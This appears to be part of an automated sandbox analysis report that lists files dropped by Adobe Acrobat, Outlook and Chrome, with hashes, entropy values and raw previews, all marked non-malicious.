                              MD5:91F06491552FC977E9E8AF47786EE7C1
                              SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                              SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                              SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                              Malicious:false
                              Reputation:unknown
                              Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:

                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                              Category:dropped
                              Size (bytes):15114
                              Entropy (8bit):5.335565200272996
                              Encrypted:false
                              SSDEEP:
                              MD5:54DD480D8E8309641D98BC416C5425A9
                              SHA1:C42F02C3B8B7151F32662DBA02B7A2312B020E8E
                              SHA-256:3646357BBE2E1919AB9B78363B2FC82DBDCB982154D64C6F036AF790ED6BA697
                              SHA-512:E1BC6C2192F5F0E8AB941C9CDDD11912EE337576DBB5F8D4AB67544C7A49D0659DFB2DA63DFCF5F59B31C82BA876419A3BC8C7A6E1C6BDDDDFFAE2A44DFABC82
                              Malicious:false
                              Reputation:unknown
                              Preview:SessionID=bc082943-8dec-4e4e-9990-ac446b7654ab.1722347339488 Timestamp=2024-07-30T09:48:59:488-0400 ThreadID=6768 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=bc082943-8dec-4e4e-9990-ac446b7654ab.1722347339488 Timestamp=2024-07-30T09:48:59:490-0400 ThreadID=6768 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=bc082943-8dec-4e4e-9990-ac446b7654ab.1722347339488 Timestamp=2024-07-30T09:48:59:490-0400 ThreadID=6768 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=bc082943-8dec-4e4e-9990-ac446b7654ab.1722347339488 Timestamp=2024-07-30T09:48:59:490-0400 ThreadID=6768 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=bc082943-8dec-4e4e-9990-ac446b7654ab.1722347339488 Timestamp=2024-07-30T09:48:59:490-0400 ThreadID=6768 Component=ngl-lib_NglAppLib Description="SetConf

                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):29752
                              Entropy (8bit):5.427722398673012
                              Encrypted:false
                              SSDEEP:
                              MD5:DDF43A21D4269E68EDAA79D277F638D2
                              SHA1:560E130528F6DBA9E1B2156E3D15FB1E42BE6BB6
                              SHA-256:F7E1EE0E9230D00B2F79EFAE77021233312EF4E1D6907BEBAB3ADA0702C898A4
                              SHA-512:26513BEE92DAADE5F3A3F51F2BDB9384666FC9D773709589041EBA6A55C33D3752CF0106773A51F5FEB65115BE76886A81EAE7162F3AE29BD55276EA99D1A8CD
                              Malicious:false
                              Reputation:unknown
                              Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-

                              C:\Users\user\AppData\Local\Temp\acrocef_low\00cb4d1a-6946-4af5-af93-06fe65ddec1b.tmp

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                              Category:dropped
                              Size (bytes):386528
                              Entropy (8bit):7.9736851559892425
                              Encrypted:false
                              SSDEEP:
                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                              Malicious:false
                              Reputation:unknown
                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                              C:\Users\user\AppData\Local\Temp\acrocef_low\43c79e40-d8c2-472a-bfc9-e046580973a1.tmp

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                              Category:dropped
                              Size (bytes):758601
                              Entropy (8bit):7.98639316555857
                              Encrypted:false
                              SSDEEP:
                              MD5:3A49135134665364308390AC398006F1
                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                              Malicious:false
                              Reputation:unknown
                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                              C:\Users\user\AppData\Local\Temp\acrocef_low\ad2722bf-6ff7-47cd-943e-2cbd05144acb.tmp

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                              Category:dropped
                              Size (bytes):1419751
                              Entropy (8bit):7.976496077007677
                              Encrypted:false
                              SSDEEP:
                              MD5:0F358F16BAE410EEF2BCE346993AAF5B
                              SHA1:B516E557DD59FFC4D930C20CB07806273D11F7AA
                              SHA-256:CF03A8705A7D38C62146C95792C58B6E26F8320CA23AE8A300FC1A2E399F760E
                              SHA-512:05FED8A7FADCB530BAAC129DB012325F13D72C9E17DCA75B7F5CB72660D86F511E60333AE0220C3F39AEBA3583A9D84A9B1A5C1D6021877FF05053832017B107
                              Malicious:false
                              Reputation:unknown
                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                              C:\Users\user\AppData\Local\Temp\acrocef_low\d4d79f4a-e72a-4aec-b363-bee81474d779.tmp

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                              Category:dropped
                              Size (bytes):1407294
                              Entropy (8bit):7.97605879016224
                              Encrypted:false
                              SSDEEP:
                              MD5:D1BC27E013E1129B27D3BE5F4567D495
                              SHA1:D2D1B846698798C80E57917477F7B98054B48925
                              SHA-256:3EF526805CA6690C3E477DFD81BFD4B28B8D82CCA8E3641C3EDA0EC37F332DDC
                              SHA-512:EBCEFA11F5BC59D602D90177B460B0F0DA59534D347FFBAF1A7C78118A3A221A02284E0A34164F6C0710C1B4E88504C4A20DA69AC998B5EE613A017B208316CB
                              Malicious:false
                              Reputation:unknown
                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                              C:\Users\user\AppData\Local\Temp\~DF922170B28B54B1FD.TMP

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):163840
                              Entropy (8bit):0.36248248121257204
                              Encrypted:false
                              SSDEEP:
                              MD5:A16A83D34226FCF5E661C17DC1DB0EAB
                              SHA1:785C4870586A71080E711815CF4A8D59CEF28598
                              SHA-256:067E935CE0A5DB93B1A16898FC2860D7E07DF1DAE81CFB21808F7ACD64EA1FBA
                              SHA-512:14D4A37115047D8F341112225657B80223D9184A47551509756DEC5522274470CA388A588C8B173ACDFF17F973533C67BB25B4C92779A5F12D531EF00C0D1FE4
                              Malicious:false
                              Reputation:unknown
                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):30
                              Entropy (8bit):1.2389205950315936
                              Encrypted:false
                              SSDEEP:
                              MD5:C05CD3B7AB33D1FFC15F8E23321DE76D
                              SHA1:020E6458D59B5798278EE89D34AC5961A060BF3E
                              SHA-256:63999F23789921841637A04998854BEC7F52CA025164EC89BBBA7E778675349B
                              SHA-512:B6D7F94249C057F9ED78331B28C3CD852B07E059425600E17C2B5362F109F1B6DF6531487D9F5CDCABE0F2779E052149D9679DCB9A8358807BB1AADCC6E4FE43
                              Malicious:false
                              Reputation:unknown
                              Preview:..............................

                              C:\Users\user\AppData\Roaming\Microsoft\Outlook\NoEmail.srs

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):16384
                              Entropy (8bit):0.6696411388596322
                              Encrypted:false
                              SSDEEP:
                              MD5:F3D76A5FDCA6ED1B8E8A92E194643F41
                              SHA1:8A432FB2046F3D250F1E3501BF14B1FE94A8BECD
                              SHA-256:76FF396BB9F935807473BD94A730EA23B765BDD0D2883266468B9822A19EC5DF
                              SHA-512:99E37243F8D10D0BD9D4DAFE709F43ED0E4FF5871466267AC5759D39846307DD7202DAE230B5A508AFE9B432384A7102C4B8EC02F227B55119CE07F1215C9BD4
                              Malicious:false
                              Reputation:unknown
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 30 12:47:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2673
                              Entropy (8bit):3.986947349736248
                              Encrypted:false
                              SSDEEP:
                              MD5:994199A41D3CBF3A7854AA5AC3013758
                              SHA1:BF2490E7F47F6577CD0AE27AF6376009786BE273
                              SHA-256:95F6A39698932D99273FCD09495405BA3B6482D5EB1B1AD4CF730093897D64CF
                              SHA-512:22688B69E2CCD4E3760E8070FD1EB41D7F1872089FD33E2608A0AA4280890B5D2362D7742A6A1834AFF68EBD328D8DB9820E2D5953DEBEDA00CD7DD90852344D
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 30 12:47:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2675
                              Entropy (8bit):4.00056295702644
                              Encrypted:false
                              SSDEEP:
                              MD5:41C5F2850767902C2FA75557E76D0019
                              SHA1:CADD8F91305BE0F541C6AF6FE55B6974C9FA55BC
                              SHA-256:C9EB28F8C74F65D90B319583100B7F2E55D47CA39D6C494F3083DF6293CDBB42
                              SHA-512:53AEBBBB26EFEFCDD51FF0FAA73FDB765326AACD97E3EEAA7DF84A1E91BB5F70F90B2C3777A1000E58EF87DC8909BE55E97E8B1B588F05106BECE67808027945
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2689
                              Entropy (8bit):4.010673642525937
                              Encrypted:false
                              SSDEEP:
                              MD5:A580BF3F5228D488D10413BD8AA57871
                              SHA1:21457DB53695980FE4B7ED4F70BFB512B4DB23DA
                              SHA-256:5C8B57F2205900F9F3DB5789D321B8BFB518659D9D8FC1082CF2791EF6592672
                              SHA-512:8820DDDDB243D671A1BC9889F1A890FB2D7516BD955D41C2970914C37EABF95507F0B37A9A05BAF0704D92B0C03647DB0B02BB7FD66459864A75E3C5A1707125
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 30 12:47:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2677
                              Entropy (8bit):3.998968482702969
                              Encrypted:false
                              SSDEEP:
                              MD5:ED674FB2D63AE9B158A8E23C1D88A459
                              SHA1:D6F92EF0FC9D2CF90DB29474FB8D6DBCBB478ED0
                              SHA-256:17E5E4522F7BA01557E2DED981381632478E2476CE92A19002C60DC1D910D0EE
                              SHA-512:1D1D99D94E7275F257883A31A489A5CB7B4EB7C2965C321CA73EB03E55C95028B5C823136E306568209A04672B53A6C202486BDA4009D45647DBAA41C7978F98
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 30 12:47:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2677
                              Entropy (8bit):3.989353838556874
                              Encrypted:false
                              SSDEEP:
                              MD5:EA669CBD57876519D2DA53FC409BF90F
                              SHA1:60D0E007CA350D8149A3DF31F8AE61BAC03CEE50
                              SHA-256:DC9689B9BDACDFD1B2398CDA7706281D6721B7AB8B841CA50D788788286058DF
                              SHA-512:29BC1CCC81841107DE2B56AFDD829B454E35C7454AF509FA5BCD6B017C15C56194338F97190E7CA27BA332EFBFE36BB451C101E371E506D9AAF3B071348558CF
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 30 12:47:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2679
                              Entropy (8bit):3.9992521234984717
                              Encrypted:false
                              SSDEEP:
                              MD5:1FC47A8E583F757AD26B4566A9950D5B
                              SHA1:AA927DAF54FE3B62C800E9BA552242B7B8344219
                              SHA-256:A51055C4E196787D65E71C1FB93F4912AFD6A346B3F951F028140E17314A9488
                              SHA-512:37405F13CF972FECA1CAB3E8D6C82BED16E7458D8E87D8D52F804BEC5A6183AEA1F99F0C1D0C4A2881754FE43C8D00B15F18E1E9FFF004748C83D325274D15D5
                              Malicious:false
                              Reputation:unknown
